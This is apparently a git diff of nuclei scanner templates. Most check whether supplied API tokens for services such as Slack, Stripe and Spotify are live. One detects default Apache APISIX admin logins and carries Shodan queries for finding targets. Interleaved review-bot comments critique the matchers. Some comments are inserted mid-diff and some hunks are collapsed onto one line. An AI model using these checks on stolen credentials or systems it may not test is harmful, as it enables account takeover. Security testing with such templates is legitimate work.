- Accept: application/vnd.pagerduty+json;version=2
- Authorization: Token token={{token}}
- matchers:
- - type: status
- status:
- - 401
- negative: true
diff --git a/nuclei-templates/Other/api-pendo.yaml b/nuclei-templates/Other/api-pendo.yaml
deleted file mode 100644
index d7492ce8a5..0000000000
--- a/nuclei-templates/Other/api-pendo.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: api-pendo
-info:
- name: Pendo API Test
- author: zzeitlin
- reference: https://help.pendo.io/resources/support-library/api/index.html
- severity: info
- tags: token-spray,pendo
-requests:
- - method: GET
- path:
- - "https://app.pendo.io/api/v1/feature"
- - "https://app.pendo.io/api/v1/metadata/schema/account"
- headers:
- Content-Type: application/json
- X-Pendo-Integration-Key: "{{token}}"
- matchers:
- - type: status
- status:
- - 403
- negative: true
diff --git a/nuclei-templates/Other/api-petfinder-480.yaml b/nuclei-templates/Other/api-petfinder-480.yaml
deleted file mode 100644
index 3f63ed4eef..0000000000
--- a/nuclei-templates/Other/api-petfinder-480.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: api-petfinder
-info:
- name: Petfinder API Test
- author: daffainfo
- severity: info
- reference:
- - https://www.petfinder.com/developers/v2/docs/
- - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md
- tags: token-spray,petfinder
-self-contained: true
-requests:
- - raw:
- - |
- POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1
- Host: api.petfinder.com
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 81
-
- grant_type=client_credentials&client_id={{id}}&client_secret={{secret}}
- matchers:
- - type: word
- part: body
- words:
- - '"token_type"'
- - '"expires_in"'
- - '"access_token"'
- condition: and
diff --git a/nuclei-templates/Other/api-petfinder.yaml b/nuclei-templates/Other/api-petfinder.yaml
new file mode 100644
index 0000000000..ae0b6866a1
--- /dev/null
+++ b/nuclei-templates/Other/api-petfinder.yaml
@@ -0,0 +1,31 @@
+id: api-petfinder
+
+info:
+ name: Petfinder API Test
+ author: daffainfo
+ severity: info
+ description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted
+ reference:
+ - https://www.petfinder.com/developers/v2/docs/
+ - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder
+ tags: token-spray,petfinder
+
+self-contained: true
+requests:
+ - raw:
+ - |
+ POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1
+ Host: api.petfinder.com
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 81
+
+ grant_type=client_credentials&client_id={{id}}&client_secret={{secret}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"token_type"'
+ - '"expires_in"'
+ - '"access_token"'
+ condition: and
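Review bot: The raw request in api-petfinder.yaml hard-codes `Content-Length: 81` above a body of `grant_type=client_credentials&client_id={{id}}&client_secret={{secret}}`, whose real length depends on the substituted `{{id}}` and `{{secret}}` values. Where the raw header is sent as written, the server reads a truncated or over-long body and the token request fails or stalls regardless of whether the credentials are valid; where the client recomputes the length, the line is merely misleading to the next maintainer. Drop the `Content-Length: 81` line and let the client set it.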
diff --git a/nuclei-templates/Other/api-pivotaltracker-482.yaml b/nuclei-templates/Other/api-pivotaltracker-482.yaml
new file mode 100644
index 0000000000..aaeac3eacf
--- /dev/null
+++ b/nuclei-templates/Other/api-pivotaltracker-482.yaml
@@ -0,0 +1,24 @@
+id: api-pivotaltracker
+
+info:
+ name: PivotalTracker API Test
+ author: zzeitlin
+ reference: https://www.pivotaltracker.com/help/api
+ severity: info
+
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://www.pivotaltracker.com/services/v5/me"
+ headers:
+ X-TrackerToken: "{{token}}"
+
+ matchers:
+ - type: word
+ part: body
+ negative: true
+ words:
+ - 'invalid_authentication'
+ - 'unauthenticated'
diff --git a/nuclei-templates/Other/api-pivotaltracker.yaml b/nuclei-templates/Other/api-pivotaltracker.yaml
deleted file mode 100644
index f46a5fb6ed..0000000000
--- a/nuclei-templates/Other/api-pivotaltracker.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: api-pivotaltracker
-info:
- name: PivotalTracker API Test
- author: zzeitlin
- reference: https://www.pivotaltracker.com/help/api
- severity: info
- tags: token-spray,pivotaltracker
-requests:
- - method: GET
- path:
- - "https://www.pivotaltracker.com/services/v5/me"
- headers:
- X-TrackerToken: "{{token}}"
- matchers:
- - type: word
- part: body
- negative: true
- words:
- - 'invalid_authentication'
diff --git a/nuclei-templates/Other/api-postmark.yaml b/nuclei-templates/Other/api-postmark.yaml
new file mode 100644
index 0000000000..419b023723
--- /dev/null
+++ b/nuclei-templates/Other/api-postmark.yaml
@@ -0,0 +1,18 @@
+id: api-postmark
+info:
+ name: PostMark API Test
+ author: zzeitlin
+ reference: https://postmarkapp.com/developer/api/overview
+ severity: info
+ tags: token-spray,postmark
+requests:
+ - method: GET
+ path:
+ - "https://api.postmarkapp.com/stats/outbound"
+ headers:
+ Accept: application/json
+ X-Postmark-Server-Token: "{{token}}"
+ matchers:
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/api-quip-484.yaml b/nuclei-templates/Other/api-quip-484.yaml
new file mode 100644
index 0000000000..6fabacb6de
--- /dev/null
+++ b/nuclei-templates/Other/api-quip-484.yaml
@@ -0,0 +1,23 @@
+id: api-quip
+info:
+ name: Quip API Test
+ author: daffainfo
+ severity: info
+ reference:
+ - https://quip.com/dev/automation/documentation
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md
+ tags: token-spray,quip
+self-contained: true
+requests:
+ - raw:
+ - |
+ GET https://platform.quip.com/1/users/current HTTP/1.1
+ Host: platform.quip.com
+ Authorization: Bearer {{token}}
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"id":'
+ - '"name":'
+ condition: and
diff --git a/nuclei-templates/Other/api-quip.yaml b/nuclei-templates/Other/api-quip.yaml
deleted file mode 100644
index 70239345aa..0000000000
--- a/nuclei-templates/Other/api-quip.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: api-quip
-
-info:
- name: Quip API Test
- author: daffainfo
- severity: info
- description: File Sharing and Storage for groups
- reference:
- - https://quip.com/dev/automation/documentation
- - https://github.com/daffainfo/all-about-apikey/tree/main/quip
- tags: token-spray,quip
-
-self-contained: true
-requests:
- - raw:
- - |
- GET https://platform.quip.com/1/users/current HTTP/1.1
- Host: platform.quip.com
- Authorization: Bearer {{token}}
-
- matchers:
- - type: word
- part: body
- words:
- - '"id":'
- - '"name":'
- condition: and
diff --git a/nuclei-templates/Other/api-rijksmuseum-486.yaml b/nuclei-templates/Other/api-rijksmuseum.yaml
similarity index 100%
rename from nuclei-templates/Other/api-rijksmuseum-486.yaml
rename to nuclei-templates/Other/api-rijksmuseum.yaml
diff --git a/nuclei-templates/Other/api-scanii-488.yaml b/nuclei-templates/Other/api-scanii-488.yaml
deleted file mode 100644
index a50bcb42a1..0000000000
--- a/nuclei-templates/Other/api-scanii-488.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: api-scanii
-
-info:
- name: Scanii API Test
- author: daffainfo
- severity: info
- reference:
- - https://docs.scanii.com/v2.1/resources.html
- - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md
- tags: token-spray,scanii
-
-self-contained: true
-requests:
- - raw:
- - |
- GET https://api.scanii.com/v2.1/ping HTTP/1.1
- Authorization: Basic {{base64(api + ':' + secret)}}
- Host: api.scanii.com
-
- matchers:
- - type: word
- part: body
- words:
- - '"key"'
- - '"message" : "pong"'
- condition: and
diff --git a/nuclei-templates/Other/api-scanii.yaml b/nuclei-templates/Other/api-scanii.yaml
new file mode 100644
index 0000000000..9c9b50f9e0
--- /dev/null
+++ b/nuclei-templates/Other/api-scanii.yaml
@@ -0,0 +1,26 @@
+id: api-scanii
+
+info:
+ name: Scanii API Test
+ author: daffainfo
+ severity: info
+ reference:
+ - https://docs.scanii.com/v2.1/resources.html
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md
+ tags: token-spray,scanii
+
+self-contained: true
+requests:
+ - raw:
+ - |
+ GET https://api.scanii.com/v2.1/ping HTTP/1.1
+ Authorization: Basic {{base64(api + ':' + secret)}}
+ Host: api.scanii.com
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"key"'
+ - '"message" : "pong"'
+ condition: and
diff --git a/nuclei-templates/Other/sendgrid.yaml b/nuclei-templates/Other/api-sendgrid.yaml
similarity index 100%
rename from nuclei-templates/Other/sendgrid.yaml
rename to nuclei-templates/Other/api-sendgrid.yaml
diff --git a/nuclei-templates/Other/api-slack.yaml b/nuclei-templates/Other/api-slack.yaml
new file mode 100644
index 0000000000..37f2441d46
--- /dev/null
+++ b/nuclei-templates/Other/api-slack.yaml
@@ -0,0 +1,19 @@
+id: api-slack
+info:
+ name: Slack API Test
+ author: zzeitlin
+ reference: https://api.slack.com/methods/auth.test
+ severity: info
+ tags: token-spray,slack
+requests:
+ - method: POST
+ path:
+ - "https://slack.com/api/auth.test"
+ headers:
+ Authorization: Bearer {{token}}
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'error'
+ negative: true
diff --git a/nuclei-templates/Other/api-sonarcloud-494.yaml b/nuclei-templates/Other/api-sonarcloud-494.yaml
index 6963e2eb83..c33160fe64 100644
--- a/nuclei-templates/Other/api-sonarcloud-494.yaml
+++ b/nuclei-templates/Other/api-sonarcloud-494.yaml
@@ -1,22 +1,18 @@ id: api-sonarcloud - info: name: SonarCloud API Test author: zzeitlin - severity: info reference: https://sonarcloud.io/web_api/api/authentication - - -self-contained: true + severity: info + tags: token-spray,sonarcloud requests: - method: GET path: - "https://sonarcloud.io/api/authentication/validate" headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body words: - - '{"valid": true}' + - 'true'
diff --git a/nuclei-templates/Other/api-spotify-495.yaml b/nuclei-templates/Other/api-spotify-495.yaml
deleted file mode 100644
index 289c24509a..0000000000
--- a/nuclei-templates/Other/api-spotify-495.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: api-spotify
-info:
- name: Spotify API Test
- author: zzeitlin
- reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
- severity: info
- tags: token-spray,spotify
-requests:
- - method: GET
- path:
- - "https://api.spotify.com/v1/me"
- headers:
- Authorization: Bearer {{token}}
- matchers:
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/api-spotify.yaml b/nuclei-templates/Other/api-spotify.yaml
new file mode 100644
index 0000000000..ee518e36b4
--- /dev/null
+++ b/nuclei-templates/Other/api-spotify.yaml
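Review bot: The word matcher in api-sonarcloud-494.yaml is now the bare substring `'true'` over the whole body, which also fires on any other field or markup that happens to contain that word, while the `'{"valid": true}'` it replaces would have missed the same answer serialised without the space. A regex tolerates the spacing without widening the match: `- type: regex` / `part: body` / `regex: ['"valid"\s*:\s*true']`.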
@@ -0,0 +1,25 @@
+id: api-spotify
+
+info:
+ name: Spotify API Test
+ author: zzeitlin
+ severity: info
+ reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
+ tags: token-spray,spotify
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.spotify.com/v1/me/player/devices"
+ headers:
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"devices":'
+ - '"id":'
+ - '"is_active":'
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/api-square-496.yaml b/nuclei-templates/Other/api-square-496.yaml
new file mode 100644
index 0000000000..f90e538715
--- /dev/null
+++ b/nuclei-templates/Other/api-square-496.yaml
@@ -0,0 +1,21 @@
+id: api-square
+info:
+ name: Square API Test
+ author: zzeitlin
+ reference: https://developer.squareup.com/explorer/square/locations-api/list-locations
+ severity: info
+ tags: token-spray,square
+requests:
+ - method: GET
+ path:
+ - "https://connect.squareup.com/v2/locations"
+ - "https://connect.squareupsandbox.com/v2/locations"
+ headers:
+ Content-Type: application/json
+ Authorization: Bearer {{token}}
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'errors'
+ negative: true
diff --git a/nuclei-templates/Other/api-square.yaml b/nuclei-templates/Other/api-square.yaml
deleted file mode 100644
index 7ccb835189..0000000000
--- a/nuclei-templates/Other/api-square.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: api-square
-
-info:
- name: Square API Test
- author: zzeitlin
- reference: https://developer.squareup.com/explorer/square/locations-api/list-locations
- severity: info
- tags: token-spray,square
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://connect.squareup.com/v2/locations"
- - "https://connect.squareupsandbox.com/v2/locations"
- headers:
- Content-Type: application/json
- Authorization: Bearer {{token}}
-
- matchers:
- - type: word
- part: body
- words:
- - 'errors'
- negative: true
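Review bot: api-spotify.yaml checks a token by calling `/v1/me/player/devices` and requiring `'"devices":'`, `'"id":'` and `'"is_active":'` together under `condition: and`; an account with no registered device presumably returns an empty `devices` list without those two inner fields, and a token that lacks the playback-state scope is refused for that endpoint, so a valid token is reported as dead. A profile endpoint such as `/v1/me`, matched on a key every user object carries (`'"id":'`) plus status 200, does not depend on account state. The same empty-collection false negative applies to api-thecatapi-502.yaml (`/v1/votes` matched on `'"country_code":'`/`'"created_at":'`, which an account that has never voted cannot satisfy) and api-webex.yaml (`/v1/rooms` matched on `'id'`/`'title'`/`'type'` when the user is in no room).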
diff --git a/nuclei-templates/Other/api-sslmate-497.yaml b/nuclei-templates/Other/api-sslmate-497.yaml
deleted file mode 100644
index e6bcfe12ee..0000000000
--- a/nuclei-templates/Other/api-sslmate-497.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: api-sslmate
-info:
- name: SSLMate API Test
- author: 0ri2N
- severity: info
- reference:
- - https://sslmate.com
- - https://sslmate.com/help/
- - https://sslmate.com/help/reference/apiv2
- tags: dns,ssl,recon,sslmate,token-spray
-self-contained: true
-requests:
- - method: GET
- path:
- - https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
- headers:
- Authorization: Bearer {{token}}
- matchers:
- - type: word
- part: body
- words:
- - '"exists"'
- - '"wildcard"'
- - '"auto_renew"'
- condition: and
diff --git a/nuclei-templates/Other/api-sslmate.yaml b/nuclei-templates/Other/api-sslmate.yaml
new file mode 100644
index 0000000000..940d325e12
--- /dev/null
+++ b/nuclei-templates/Other/api-sslmate.yaml
@@ -0,0 +1,28 @@
+id: api-sslmate
+
+info:
+ name: SSLMate API Test
+ author: 0ri2N
+ severity: info
+ reference:
+ - https://sslmate.com
+ - https://sslmate.com/help/
+ - https://sslmate.com/help/reference/apiv2
+ tags: dns,ssl,recon,sslmate,token-spray
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - https://sslmate.com/api/v2/certs/example.com?expand=current.crt
+ headers:
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"exists"'
+ - '"wildcard"'
+ - '"auto_renew"'
+ condition: and
diff --git a/nuclei-templates/Other/api-stripe.yaml b/nuclei-templates/Other/api-stripe.yaml
deleted file mode 100644
index e75c2692bc..0000000000
--- a/nuclei-templates/Other/api-stripe.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: api-stripe
-info:
- name: Stripe API Test
- author: zzeitlin
- reference: https://stripe.com/docs/api/authentication
- severity: info
- tags: token-spray,stripe
-requests:
- - method: GET
- path:
- - "https://api.stripe.com/v1/charges"
- headers:
- Authorization: Basic {{base64(token + ':')}}
- matchers:
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/api-thecatapi-502.yaml b/nuclei-templates/Other/api-thecatapi-502.yaml
new file mode 100644
index 0000000000..30a0507cb6
--- /dev/null
+++ b/nuclei-templates/Other/api-thecatapi-502.yaml
@@ -0,0 +1,23 @@
+id: api-thecatapi
+info:
+ name: TheCatApi API Test
+ author: daffainfo
+ severity: info
+ reference:
+ - https://docs.thecatapi.com/
+ - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
+ tags: token-spray,thecatapi
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.thecatapi.com/v1/votes"
+ headers:
+ x-api-key: "{{token}}"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"country_code":'
+ - '"created_at":'
+ condition: and
diff --git a/nuclei-templates/Other/api-thecatapi-503.yaml b/nuclei-templates/Other/api-thecatapi-503.yaml
deleted file mode 100644
index 54740e47d8..0000000000
--- a/nuclei-templates/Other/api-thecatapi-503.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: api-thecatapi
-
-info:
- name: TheCatApi API Test
- author: daffainfo
- severity: info
- reference:
- - https://docs.thecatapi.com/
- - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md
- tags: token-spray,thecatapi
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.thecatapi.com/v1/votes"
- headers:
- x-api-key: "{{token}}"
-
- matchers:
- - type: word
- part: body
- words:
- - 'id":'
- - 'image_id":'
- - 'sub_id":'
- condition: and
diff --git a/nuclei-templates/Other/api-tink-504.yaml b/nuclei-templates/Other/api-tink-504.yaml
deleted file mode 100644
index c8049aec74..0000000000
--- a/nuclei-templates/Other/api-tink-504.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: api-tink
-info:
- name: Tink API Test
- author: dwisiswant0
- severity: info
- reference:
- - https://docs.tink.com/api
- tags: token-spray,tink
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.tink.com/api/v1/user"
- headers:
- Authorization: Bearer {{token}}
- matchers:
- - type: word
- part: body
- words:
- - "appId"
- - "externalUserId"
- - "username"
- condition: and
diff --git a/nuclei-templates/Other/api-tink.yaml b/nuclei-templates/Other/api-tink.yaml
new file mode 100644
index 0000000000..a7c5de8ccd
--- /dev/null
+++ b/nuclei-templates/Other/api-tink.yaml
@@ -0,0 +1,25 @@
+id: api-tink
+
+info:
+ name: Tink API Test
+ author: dwisiswant0
+ reference: https://docs.tink.com/api
+ severity: info
+ tags: token-spray,tink
+
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.tink.com/api/v1/user"
+ headers:
+ Authorization: Bearer {{token}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "appId"
+ - "externalUserId"
+ - "username"
+ condition: and
diff --git a/nuclei-templates/Other/api-tinypng.yaml b/nuclei-templates/Other/api-tinypng-505.yaml
similarity index 100%
rename from nuclei-templates/Other/api-tinypng.yaml
rename to nuclei-templates/Other/api-tinypng-505.yaml
diff --git a/nuclei-templates/Other/api-urlscan-508.yaml b/nuclei-templates/Other/api-urlscan-508.yaml
index bcb14d8c1c..93d5b196db 100644
--- a/nuclei-templates/Other/api-urlscan-508.yaml
+++ b/nuclei-templates/Other/api-urlscan-508.yaml
@@ -6,7 +6,7 @@ info: severity: info reference: - https://urlscan.io/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true
diff --git a/nuclei-templates/Other/api-vercel-510.yaml b/nuclei-templates/Other/api-vercel-510.yaml
new file mode 100644
index 0000000000..4f5b8351cb
--- /dev/null
+++ b/nuclei-templates/Other/api-vercel-510.yaml
@@ -0,0 +1,23 @@
+id: api-vercel
+info:
+ name: Vercel API Test
+ author: dwisiswant0
+ severity: info
+ reference:
+ - https://vercel.com/docs/rest-api
+ tags: token-spray,vercel
+self-contained: true
+requests:
+ - method: GET
+ path:
+ - "https://api.vercel.com/www/user"
+ headers:
+ Authorization: Bearer {{token}}
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"user":'
+ - '"username":'
+ - '"email":'
+ condition: and
diff --git a/nuclei-templates/Other/api-vercel.yaml b/nuclei-templates/Other/api-vercel.yaml
deleted file mode 100644
index 0c3baed35a..0000000000
--- a/nuclei-templates/Other/api-vercel.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: api-vercel
-
-info:
- name: Vercel API Test
- author: dwisiswant0
- severity: info
- reference: https://vercel.com/docs/rest-api
- tags: token-spray,vercel
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://api.vercel.com/www/user"
- headers:
- Authorization: Bearer {{token}}
-
- matchers:
- - type: word
- part: body
- words:
- - '"user":'
- - '"username":'
- - '"email":'
- condition: and
diff --git a/nuclei-templates/Other/api-virustotal.yaml b/nuclei-templates/Other/api-virustotal-512.yaml
similarity index 100%
rename from nuclei-templates/Other/api-virustotal.yaml
rename to nuclei-templates/Other/api-virustotal-512.yaml
diff --git a/nuclei-templates/Other/api-wakatime-514.yaml b/nuclei-templates/Other/api-wakatime-514.yaml
deleted file mode 100644
index bab9482288..0000000000
--- a/nuclei-templates/Other/api-wakatime-514.yaml
+++ /dev/null
@@ -1,16 +0,0 @@ -id: api-wakatime -info: - name: WakaTime CI API Test - author: zzeitlin - reference: https://wakatime.com/developers - severity: info - tags: token-spray,wakatime -requests: - - method: GET - path: - - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - matchers: - - type: status - status: - - 401 - negative: true diff --git a/nuclei-templates/Other/api-webex-515.yaml b/nuclei-templates/Other/api-webex-515.yaml deleted file mode 100644 index 4158e150c5..0000000000 --- a/nuclei-templates/Other/api-webex-515.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-webex -info: - name: Cisco Webex API Test - author: dwisiswant0 - severity: info - reference: - - https://developer.webex.com/docs/getting-started - tags: token-spray,cisco,webex -self-contained: true -requests: - - method: GET - path: - - "https://webexapis.com/v1/rooms" - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - 'id' - - 'title' - - 'type' - condition: and diff --git a/nuclei-templates/Other/api-webex.yaml b/nuclei-templates/Other/api-webex.yaml new file mode 100644 index 0000000000..c5e61ded0b --- /dev/null +++ b/nuclei-templates/Other/api-webex.yaml @@ -0,0 +1,25 @@ +id: api-webex + +info: + name: Cisco Webex API Test + author: dwisiswant0 + severity: info + reference: https://developer.webex.com/docs/getting-started + tags: token-spray,cisco,webex + +self-contained: true +requests: + - method: GET + path: + - "https://webexapis.com/v1/rooms" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'id' + - 'title' + - 'type' + condition: and diff --git a/nuclei-templates/Other/api-weglot-516.yaml b/nuclei-templates/Other/api-weglot-516.yaml deleted file mode 100644 index cf6fd834e7..0000000000 --- a/nuclei-templates/Other/api-weglot-516.yaml +++ /dev/null 
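Review bot: The word matcher in the new api-webex.yaml matches the bare substrings `'id'`, `'title'` and `'type'` in the response body, which are short enough to occur in an error or HTML response as well (`id` is a substring of `valid`, for instance), so a rejected token may still satisfy `condition: and`. The api-vercel-510.yaml added in this same commit matches quoted JSON keys instead; following that style, `- '"id":'`, `- '"title":'`, `- '"type":'` keeps the conjunction meaningful. The removed api-webex-515.yaml had the same weakness, so this is carried over rather than introduced here.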
@@ -1,20 +0,0 @@ -id: api-weglot -info: - name: WeGlot API Test - author: zzeitlin - reference: https://developers.weglot.com/api/reference - severity: info - tags: token-spray,weglot -requests: - - method: POST - path: - - "https://api.weglot.com/translate?api_key={{token}}" - headers: - Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - matchers: - - type: word - part: body - negative: true - words: - - 'does not exist' diff --git a/nuclei-templates/Other/api-wordcloud.yaml b/nuclei-templates/Other/api-wordcloud-517.yaml similarity index 100% rename from nuclei-templates/Other/api-wordcloud.yaml rename to nuclei-templates/Other/api-wordcloud-517.yaml diff --git a/nuclei-templates/Other/api-youtube-519.yaml b/nuclei-templates/Other/api-youtube-519.yaml deleted file mode 100644 index 0913478aad..0000000000 --- a/nuclei-templates/Other/api-youtube-519.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-youtube - -info: - name: YouTube API Test - author: zzeitlin - reference: https://developers.google.com/youtube/v3/docs - severity: info - - -self-contained: true -requests: - - method: GET - path: - - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"kind":' - - '"pageInfo":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-youtube.yaml b/nuclei-templates/Other/api-youtube.yaml new file mode 100644 index 0000000000..acc719424f --- /dev/null +++ b/nuclei-templates/Other/api-youtube.yaml 
@@ -0,0 +1,20 @@ +id: api-youtube +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: token-spray,youtube +requests: + - method: GET + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'quotaExceeded' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apisix-default-login-491.yaml b/nuclei-templates/Other/apisix-default-login-491.yaml index c16b0c60b1..685f414bf6 100644 --- a/nuclei-templates/Other/apisix-default-login-491.yaml +++ b/nuclei-templates/Other/apisix-default-login-491.yaml @@ -1,13 +1,20 @@ id: apisix-default-login info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: apisix,apache,default-login requests: - raw: - | @@ -35,3 +42,5 @@ requests: - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/apollo-default-login-521.yaml b/nuclei-templates/Other/apollo-default-login-520.yaml similarity index 100% rename from nuclei-templates/Other/apollo-default-login-521.yaml rename to nuclei-templates/Other/apollo-default-login-520.yaml 
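Review bot: The new api-youtube.yaml requests an absolute URL (`https://www.googleapis.com/youtube/v3/activities?...`) but, unlike the api-youtube-519.yaml it replaces, no longer declares `self-contained: true`; without that flag nuclei treats the template as target-bound and expects a target list, so this token check is presumably not runnable standalone the way the other token-spray templates in this commit are. Add `self-contained: true` before `requests:`. The `matchers-condition: or` with a bare `status: 200` is acceptable only because the single hard-coded URL is the only thing ever requested; a one-line comment saying so would stop a later reader from tightening it the wrong way.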
diff --git a/nuclei-templates/Other/apple-app-site-association-524.yaml b/nuclei-templates/Other/apple-app-site-association.yaml similarity index 100% rename from nuclei-templates/Other/apple-app-site-association-524.yaml rename to nuclei-templates/Other/apple-app-site-association.yaml diff --git a/nuclei-templates/Other/appspec-yml-disclosure-527.yaml b/nuclei-templates/Other/appspec-yml-disclosure-527.yaml deleted file mode 100644 index a0229fc7c8..0000000000 --- a/nuclei-templates/Other/appspec-yml-disclosure-527.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: appspec-yml-disclosure - -info: - name: Appspec Yml Disclosure - author: dhiyaneshDk - severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json - tags: exposure,config - -requests: - - method: GET - path: - - "{{BaseURL}}/appspec.yml" - - "{{BaseURL}}/appspec.yaml" - - matchers-condition: and - matchers: - - type: word - words: - - "version:" - - "os:" - - "files:" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/appspec-yml-disclosure-528.yaml b/nuclei-templates/Other/appspec-yml-disclosure-528.yaml new file mode 100644 index 0000000000..0366a46dac --- /dev/null +++ b/nuclei-templates/Other/appspec-yml-disclosure-528.yaml @@ -0,0 +1,24 @@ +id: appspec-yml-disclosure +info: + name: Appspec Yml Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + tags: exposure,config +requests: + - method: GET + path: + - "{{BaseURL}}/appspec.yml" + - "{{BaseURL}}/appspec.yaml" + matchers-condition: and + matchers: + - type: word + words: + - "version:" + - "os:" + - "files:" + part: body + condition: and + - type: status + status: + - 200 
diff --git a/nuclei-templates/Other/arcgis-panel-530.yaml b/nuclei-templates/Other/arcgis-panel-530.yaml deleted file mode 100644 index b6b6fb7696..0000000000 --- a/nuclei-templates/Other/arcgis-panel-530.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: arcgis-panel - -info: - name: ArcGIS Enterprise Panel - author: Podalirius - severity: info - description: An ArcGIS instance was discovered. - reference: - - https://enterprise.arcgis.com/en/ - classification: - cwe-id: CWE-200 - tags: docs,arcgis,cms,panel - -requests: - - method: GET - path: - - '{{BaseURL}}/portal/portalhelp/en/' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS Enterprise' - - 'Installation and Deployment' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - - - type: regex - part: body - group: 2 - regex: - - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-panel-531.yaml b/nuclei-templates/Other/arcgis-panel-531.yaml new file mode 100644 index 0000000000..8f02ee3245 --- /dev/null +++ b/nuclei-templates/Other/arcgis-panel-531.yaml 
